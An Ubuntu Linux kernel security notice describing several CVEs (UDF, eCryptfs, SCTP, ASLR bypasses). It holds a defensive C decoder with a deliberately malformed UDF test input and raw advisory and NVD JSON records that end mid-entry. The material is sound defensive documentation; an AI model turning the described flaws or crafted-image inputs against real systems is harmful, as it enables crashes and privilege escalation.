ID USN-2542-1 Type ubuntu Reporter Ubuntu Modified 2015-03-24T00:00:00
Description
The Linux kernel's splice system call did not correctly validate its
parameters. A local, unprivileged user could exploit this flaw to cause a
denial of service (system crash). (CVE-2014-7822)
A flaw was discovered in how Thread Local Storage (TLS) is handled by the
task switching function in the Linux kernel for x86_64 based machines. A
local user could exploit this flaw to bypass the Address Space Layout
Randomization (ASLR) protection mechanism. (CVE-2014-9419)
Dmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file
name decoding. A local unprivileged user could exploit this flaw to cause a
denial of service (system crash) or potentially gain administrative
privileges. (CVE-2014-9683)
Carl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to
verify symlink size info. A local attacker, who is able to mount a malicious
UDF file system image, could exploit this flaw to cause a denial of service
(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)
Carl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not
validate inode size information. A local attacker, who is able to mount a
malicious UDF file system image, could exploit this flaw to cause a denial
of service (system crash) or possibly cause other undesired behaviors.
(CVE-2014-9729)
Carl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not
correctly verify the component length for symlinks. A local attacker, who
is able to mount a malicious UDF file system image, could exploit this flaw
to cause a denial of service (system crash) or possibly cause other
undesired behaviors. (CVE-2014-9730)
Carl H Lunde discovered an information leak in the UDF file system
(CONFIG_UDF_FS). A local attacker, who is able to mount a malicious UDF file
system image, could exploit this flaw to read potentially sensitive kernel
memory. (CVE-2014-9731)
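The UDF symlink issues above all come down to on-disk lengths that were trusted before being checked against the block that holds them. The following is an added illustration, not the kernel's code, of what a bounds-checked decoder for the ECMA-167 path-component list looks like; it assumes the 4-byte component header (type, identifier length, file version) and copies identifier bytes raw instead of decoding the UDF compressed dstring, and the sample component lists are constructed here.

```c
/* Added illustration (not the Linux kernel's code): a minimal decoder for
 * the UDF/ECMA-167 symlink path-component list with the length checks the
 * advisory describes as missing.  Assumed layout per component:
 *   u8 componentType; u8 lengthComponentIdent; u16 componentFileVersionNum;
 *   u8 componentIdent[lengthComponentIdent];
 * Identifier bytes are copied raw (real UDF stores a compressed dstring). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PC_HDR 4 /* fixed header bytes that precede the identifier */

/* Decode 'fromlen' bytes of path components into 'to' (capacity 'tolen').
 * Returns 0 on success, -1 if the list is malformed or 'to' is too small.
 * Every read is checked against the input that remains and every write
 * against the output that remains, so a component claiming more bytes than
 * the block holds is rejected instead of being read past the end. */
int udf_pc_to_path(const uint8_t *from, size_t fromlen, char *to, size_t tolen)
{
    size_t ipos = 0, opos = 0;

    if (tolen == 0) return -1;
    tolen--; /* reserve room for the terminating NUL */

    while (ipos < fromlen) {
        /* The 4-byte header itself must fit in what is left of the block. */
        if (fromlen - ipos < PC_HDR) return -1;
        uint8_t type = from[ipos];
        size_t  ilen = from[ipos + 1];
        /* Validate the identifier length before anything reads it. */
        if (ilen > fromlen - ipos - PC_HDR) return -1;
        const uint8_t *ident = from + ipos + PC_HDR;

        switch (type) {
        case 1: /* root directory; only valid with an empty identifier */
            if (ilen != 0 || tolen - opos < 1) return -1;
            to[opos++] = '/';
            break;
        case 3: /* parent directory */
            if (tolen - opos < 3) return -1;
            memcpy(to + opos, "../", 3); opos += 3;
            break;
        case 4: /* current directory */
            if (tolen - opos < 2) return -1;
            memcpy(to + opos, "./", 2); opos += 2;
            break;
        case 5: /* named component followed by a separator */
            if (tolen - opos < ilen + 1) return -1;
            memcpy(to + opos, ident, ilen); opos += ilen;
            to[opos++] = '/';
            break;
        default: /* unknown component type: refuse rather than guess */
            return -1;
        }
        ipos += PC_HDR + ilen;
    }
    /* Drop the trailing separator so "/a/b/" becomes "/a/b" (root "/" stays). */
    if (opos > 1 && to[opos - 1] == '/') opos--;
    to[opos] = '\0';
    return 0;
}

/* Constructed sample component lists (not taken from a real image). */
static const uint8_t good_pc[] = {
    1, 0, 0, 0,                          /* root */
    5, 3, 0, 0, 'e', 't', 'c',           /* "etc" */
    5, 5, 0, 0, 'h', 'o', 's', 't', 's', /* "hosts" */
};
/* Same shape, but the last component claims 200 identifier bytes while only
 * 5 remain in the block; the decoder must reject it, not over-read. */
static const uint8_t bad_pc[] = {
    1, 0, 0, 0,
    5, 200, 0, 0, 'h', 'o', 's', 't', 's',
};

/* Returns 1 if the well-formed list decodes to "/etc/hosts". */
int demo_good(void)
{
    char b[64];
    return udf_pc_to_path(good_pc, sizeof good_pc, b, sizeof b) == 0 &&
           strcmp(b, "/etc/hosts") == 0;
}
/* Returns 1 if the over-long component is rejected. */
int demo_bad(void)
{
    char b[64];
    return udf_pc_to_path(bad_pc, sizeof bad_pc, b, sizeof b) == -1;
}
/* Returns 1 if an output buffer too small for "/etc/" is rejected. */
int demo_small_out(void)
{
    char b[5];
    return udf_pc_to_path(good_pc, sizeof good_pc, b, sizeof b) == -1;
}

int main(void)
{
    printf("well-formed list decodes: %s\n", demo_good() ? "yes" : "no");
    printf("over-long component rejected: %s\n", demo_bad() ? "yes" : "no");
    printf("small output buffer rejected: %s\n", demo_small_out() ? "yes" : "no");
    return 0;
}
```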
Sun Baoliang discovered a use after free flaw in the Linux kernel's SCTP
(Stream Control Transmission Protocol) subsystem during INIT collisions. A
remote attacker could exploit this flaw to cause a denial of service
(system crash) or potentially escalate their privileges on the system.
(CVE-2015-1421)
Because of the specific conditions required for exploit, F5 Product Development considers affected BIG-IP/BIG-IQ/Enterprise Manager systems as not vulnerable in a standard configuration and severely vulnerable if the described conditions are met.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the Severity values published in the previous table. The Severity values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\nBIG-IP/BIG-IQ/Enterprise Manager\n\nIf you must load the vulnerable SCTP kernel module for your environment, F5 recommends that you block upstream traffic to the control plane of the affected systems. 
To mitigate this vulnerability for an affected system, you should permit access to the management interface, and/or the self IP that exposes SCTP listeners, over a secure network.\n\nTraffix SDC \n\nTo mitigate this vulnerability for an affected system, you should use iptables rules to limit SCTP access to trusted users only.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2015-09-09T00:00:00", "published": "2015-09-09T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/17000/200/sol17242.html", "id": "SOL17242", "title": "SOL17242 - Linux kernel SCTP vulnerability CVE-2015-1421", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:36:25", "bulletinFamily": "unix", "cvelist": ["CVE-2014-7822", "CVE-2014-9728", "CVE-2015-1421", "CVE-2014-9730", "CVE-2014-9729", "CVE-2014-9683", "CVE-2014-9419", "CVE-2014-9731"], "description": "The Linux kernel's splice system call did not correctly validate its \nparameters. A local, unprivileged user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the \ntask switching function in the Linux kernel for x86_64 based machines. A \nlocal user could exploit this flaw to bypass the Address Space Layout \nRandomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file \nname decoding. A local unprivileged user could exploit this flaw to cause a \ndenial of service (system crash) or potentially gain administrative \nprivileges. 
(CVE-2014-9683)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicious \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalidate inode size information. A local attacker, who is able to mount a \nmalicious UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicious UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicious UDF file \nsystem image, could exploit this flaw to read potentially sensitive kernel \nmemory. (CVE-2014-9731)\n\nSun Baoliang discovered a use after free flaw in the Linux kernel's SCTP \n(Stream Control Transmission Protocol) subsystem during INIT collisions. A \nremote attacker could exploit this flaw to cause a denial of service \n(system crash) or potentially escalate their privileges on the system. 
\n(CVE-2015-1421)", "edition": 5, "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "id": "USN-2541-1", "href": "https://ubuntu.com/security/notices/USN-2541-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:20", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-0274", "CVE-2014-9728", "CVE-2014-9730", "CVE-2013-7421", "CVE-2014-9729", "CVE-2014-9731"], "description": "Eric Windisch discovered a flaw in how the Linux kernel's XFS file system \nreplaces remote attributes. A local attacker with access to an XFS file \nsystem could exploit this flaw to escalate their privileges. \n(CVE-2015-0274)\n\nA flaw was discovered in the automatic loading of modules in the crypto \nsubsystem of the Linux kernel. A local user could exploit this flaw to load \ninstalled kernel modules, increasing the attack surface and potentially \nusing this to gain administrative privileges. (CVE-2013-7421)\n\nThe Linux kernel's splice system call did not correctly validate its \nparameters. A local, unprivileged user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in the crypto subsystem when screening module names \nfor automatic module loading if the name contained a valid crypto module \nname, e.g. vfat(aes). A local user could exploit this flaw to load installed \nkernel modules, increasing the attack surface and potentially using this to \ngain administrative privileges. (CVE-2014-9644)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicious \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. 
(CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalidate inode size information. A local attacker, who is able to mount a \nmalicious UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicious UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicious UDF file \nsystem image, could exploit this flaw to read potentially sensitive kernel \nmemory. (CVE-2014-9731)", "edition": 5, "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "id": "USN-2543-1", "href": "https://ubuntu.com/security/notices/USN-2543-1", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:35:55", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-0274", "CVE-2014-9728", "CVE-2014-9730", "CVE-2013-7421", "CVE-2014-9729", "CVE-2014-9731"], "description": "Eric Windisch discovered a flaw in how the Linux kernel's XFS file system \nreplaces remote attributes. A local attacker with access to an XFS file \nsystem could exploit this flaw to escalate their privileges. \n(CVE-2015-0274)\n\nA flaw was discovered in the automatic loading of modules in the crypto \nsubsystem of the Linux kernel. A local user could exploit this flaw to load \ninstalled kernel modules, increasing the attack surface and potentially \nusing this to gain administrative privileges. 
(CVE-2013-7421)\n\nThe Linux kernel's splice system call did not correctly validate its \nparameters. A local, unprivileged user could exploit this flaw to cause a \ndenial of service (system crash). (CVE-2014-7822)\n\nA flaw was discovered in the crypto subsystem when screening module names \nfor automatic module loading if the name contained a valid crypto module \nname, e.g. vfat(aes). A local user could exploit this flaw to load installed \nkernel modules, increasing the attack surface and potentially using this to \ngain administrative privileges. (CVE-2014-9644)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicious \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalidate inode size information. A local attacker, who is able to mount a \nmalicious UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicious UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicious UDF file \nsystem image, could exploit this flaw to read potentially sensitive kernel \nmemory. 
(CVE-2014-9731)", "edition": 5, "modified": "2015-03-24T00:00:00", "published": "2015-03-24T00:00:00", "id": "USN-2544-1", "href": "https://ubuntu.com/security/notices/USN-2544-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T01:38:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9529", "CVE-2014-9420", "CVE-2014-8160", "CVE-2014-9728", "CVE-2014-8989", "CVE-2014-9730", "CVE-2014-8559", "CVE-2015-0239", "CVE-2014-9584", "CVE-2014-9729", "CVE-2014-9683", "CVE-2014-9428", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9731", "CVE-2014-9585"], "description": "A flaw was discovered in the Kernel Virtual Machine's (KVM) emulation of \nthe SYSENTER instruction when the guest OS does not initialize the \nSYSENTER MSRs. A guest OS user could exploit this flaw to cause a denial of \nservice of the guest OS (crash) or potentially gain privileges on the guest \nOS. (CVE-2015-0239)\n\nAndy Lutomirski discovered an information leak in the Linux kernel's Thread \nLocal Storage (TLS) implementation allowing users to bypass the espfix to \nobtain information that could be used to bypass the Address Space Layout \nRandomization (ASLR) protection mechanism. A local user could exploit this \nflaw to obtain potentially sensitive information from kernel memory. \n(CVE-2014-8133)\n\nA restriction bypass was discovered in iptables when conntrack rules are \nspecified and the conntrack protocol handler module is not loaded into the \nLinux kernel. This flaw can cause the firewall rules on the system to be \nbypassed when conntrack rules are used. (CVE-2014-8160)\n\nA flaw was discovered with file renaming in the Linux kernel. A local user \ncould exploit this flaw to cause a denial of service (deadlock and system \nhang). (CVE-2014-8559)\n\nA flaw was discovered in how supplemental group memberships are handled in \ncertain namespace scenarios. 
A local user could exploit this flaw to bypass \nfile permission restrictions. (CVE-2014-8989)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the \ntask switching function in the Linux kernel for x86_64 based machines. A \nlocal user could exploit this flaw to bypass the Address Space Layout \nRandomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nPrasad J Pandit reported a flaw in the rock_continue function of the Linux \nkernel's ISO 9660 CDROM file system. A local user could exploit this flaw \nto cause a denial of service (system crash or hang). (CVE-2014-9420)\n\nA flaw was discovered in the fragment handling of the B.A.T.M.A.N. Advanced \nMeshing Protocol in the Linux kernel. A remote attacker could exploit this \nflaw to cause a denial of service (mesh-node system crash) via fragmented \npackets. (CVE-2014-9428)\n\nA race condition was discovered in the Linux kernel's key ring. A local \nuser could cause a denial of service (memory corruption or panic) or \npossibly have unspecified impact via the keyctl commands. (CVE-2014-9529)\n\nA memory leak was discovered in the ISO 9660 CDROM file system when parsing \nRock Ridge ER records. A local user could exploit this flaw to obtain \nsensitive information from kernel memory via a crafted iso9660 image. \n(CVE-2014-9584)\n\nA flaw was discovered in the Address Space Layout Randomization (ASLR) of \nthe Virtual Dynamically linked Shared Objects (vDSO) location. This flaw \nmakes it easier for a local user to bypass the ASLR protection mechanism. \n(CVE-2014-9585)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file \nname decoding. A local unprivileged user could exploit this flaw to cause a \ndenial of service (system crash) or potentially gain administrative \nprivileges. (CVE-2014-9683)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. 
A local attacker, who is able to mount a malicious \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalidate inode size information. A local attacker, who is able to mount a \nmalicious UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicious UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. (CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicious UDF file \nsystem image, could exploit this flaw to read potentially sensitive kernel \nmemory. (CVE-2014-9731)", "edition": 5, "modified": "2015-02-26T00:00:00", "published": "2015-02-26T00:00:00", "id": "USN-2518-1", "href": "https://ubuntu.com/security/notices/USN-2518-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-02T11:37:09", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9529", "CVE-2014-9420", "CVE-2014-8160", "CVE-2014-9728", "CVE-2014-8989", "CVE-2014-9730", "CVE-2014-8559", "CVE-2015-0239", "CVE-2014-9584", "CVE-2014-9729", "CVE-2014-9683", "CVE-2014-9428", "CVE-2014-8133", "CVE-2014-9419", "CVE-2014-9731", "CVE-2014-9585"], "description": "A flaw was discovered in the Kernel Virtual Machine's (KVM) emulation of \nthe SYSENTER instruction when the guest OS does not initialize the \nSYSENTER MSRs. 
A guest OS user could exploit this flaw to cause a denial of \nservice of the guest OS (crash) or potentially gain privileges on the guest \nOS. (CVE-2015-0239)\n\nAndy Lutomirski discovered an information leak in the Linux kernel's Thread \nLocal Storage (TLS) implementation allowing users to bypass the espfix to \nobtain information that could be used to bypass the Address Space Layout \nRandomization (ASLR) protection mechanism. A local user could exploit this \nflaw to obtain potentially sensitive information from kernel memory. \n(CVE-2014-8133)\n\nA restriction bypass was discovered in iptables when conntrack rules are \nspecified and the conntrack protocol handler module is not loaded into the \nLinux kernel. This flaw can cause the firewall rules on the system to be \nbypassed when conntrack rules are used. (CVE-2014-8160)\n\nA flaw was discovered with file renaming in the Linux kernel. A local user \ncould exploit this flaw to cause a denial of service (deadlock and system \nhang). (CVE-2014-8559)\n\nA flaw was discovered in how supplemental group memberships are handled in \ncertain namespace scenarios. A local user could exploit this flaw to bypass \nfile permission restrictions. (CVE-2014-8989)\n\nA flaw was discovered in how Thread Local Storage (TLS) is handled by the \ntask switching function in the Linux kernel for x86_64 based machines. A \nlocal user could exploit this flaw to bypass the Address Space Layout \nRandomization (ASLR) protection mechanism. (CVE-2014-9419)\n\nPrasad J Pandit reported a flaw in the rock_continue function of the Linux \nkernel's ISO 9660 CDROM file system. A local user could exploit this flaw \nto cause a denial of service (system crash or hang). (CVE-2014-9420)\n\nA flaw was discovered in the fragment handling of the B.A.T.M.A.N. Advanced \nMeshing Protocol in the Linux kernel. A remote attacker could exploit this \nflaw to cause a denial of service (mesh-node system crash) via fragmented \npackets. 
(CVE-2014-9428)\n\nA race condition was discovered in the Linux kernel's key ring. A local \nuser could cause a denial of service (memory corruption or panic) or \npossibly have unspecified impact via the keyctl commands. (CVE-2014-9529)\n\nA memory leak was discovered in the ISO 9660 CDROM file system when parsing \nRock Ridge ER records. A local user could exploit this flaw to obtain \nsensitive information from kernel memory via a crafted iso9660 image. \n(CVE-2014-9584)\n\nA flaw was discovered in the Address Space Layout Randomization (ASLR) of \nthe Virtual Dynamically linked Shared Objects (vDSO) location. This flaw \nmakes it easier for a local user to bypass the ASLR protection mechanism. \n(CVE-2014-9585)\n\nDmitry Chernenkov discovered a buffer overflow in eCryptfs' encrypted file \nname decoding. A local unprivileged user could exploit this flaw to cause a \ndenial of service (system crash) or potentially gain administrative \nprivileges. (CVE-2014-9683)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) failed to \nverify symlink size info. A local attacker, who is able to mount a malicious \nUDF file system image, could exploit this flaw to cause a denial of service \n(system crash) or possibly cause other undesired behaviors. (CVE-2014-9728)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \nvalidate inode size information. A local attacker, who is able to mount a \nmalicious UDF file system image, could exploit this flaw to cause a denial \nof service (system crash) or possibly cause other undesired behaviors. \n(CVE-2014-9729)\n\nCarl H Lunde discovered that the UDF file system (CONFIG_UDF_FS) did not \ncorrectly verify the component length for symlinks. A local attacker, who \nis able to mount a malicious UDF file system image, could exploit this flaw \nto cause a denial of service (system crash) or possibly cause other \nundesired behaviors. 
(CVE-2014-9730)\n\nCarl H Lunde discovered an information leak in the UDF file system \n(CONFIG_UDF_FS). A local attacker, who is able to mount a malicious UDF file \nsystem image, could exploit this flaw to read potentially sensitive kernel \nmemory. (CVE-2014-9731)", "edition": 5, "modified": "2015-02-26T00:00:00", "published": "2015-02-26T00:00:00", "id": "USN-2517-1", "href": "https://ubuntu.com/security/notices/USN-2517-1", "title": "Linux kernel (Utopic HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:14:36", "description": "The UDF filesystem implementation in the Linux kernel before 3.18.2 does not ensure that space is available for storing a symlink target's name along with a trailing \\0 character, which allows local users to obtain sensitive information via a crafted filesystem image, related to fs/udf/symlink.c and fs/udf/unicode.c.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9731", "type": "cve", "cwe": ["CWE-17"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9731"], "modified": "2017-07-13T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9731", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9731", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "The udf_pc_to_char function in fs/udf/symlink.c 
in the Linux kernel before 3.18.2 relies on component lengths that are unused, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9730", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9730"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9730", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9730", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "The udf_read_inode function in fs/udf/inode.c in the Linux kernel before 3.18.2 does not ensure a certain data-structure size consistency, which allows local users to cause a denial of service (system crash) via a crafted UDF filesystem image.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9729", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", 
"authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9729"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9729", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9729", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "Off-by-one error in the ecryptfs_decode_from_filename function in fs/ecryptfs/crypto.c in the eCryptfs subsystem in the Linux kernel before 3.18.2 allows local users to cause a denial of service (buffer overflow and system crash) or possibly gain privileges via a crafted filename.", "edition": 6, "cvss3": {}, "published": "2015-03-03T11:59:00", "title": "CVE-2014-9683", "type": "cve", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9683"], "modified": "2016-12-24T02:59:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:linux:linux_kernel:3.18.1", "cpe:/o:canonical:ubuntu_linux:14.10", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2014-9683", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9683", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, 
{"lastseen": "2021-02-02T06:14:36", "description": "The UDF filesystem implementation in the Linux kernel before 3.18.2 does not validate certain lengths, which allows local users to cause a denial of service (buffer over-read and system crash) via a crafted filesystem image, related to fs/udf/inode.c and fs/udf/symlink.c.", "edition": 6, "cvss3": {}, "published": "2015-08-31T10:59:00", "title": "CVE-2014-9728", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9728"], "modified": "2016-12-22T02:59:00", "cpe": ["cpe:/o:linux:linux_kernel:3.18.1"], "id": "CVE-2014-9728", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9728", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:3.18.1:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:14:36", "description": "The __switch_to function in arch/x86/kernel/process_64.c in the Linux kernel through 3.18.1 does not ensure that Thread Local Storage (TLS) descriptors are loaded before proceeding with other steps, which makes it easier for local users to bypass the ASLR protection mechanism via a 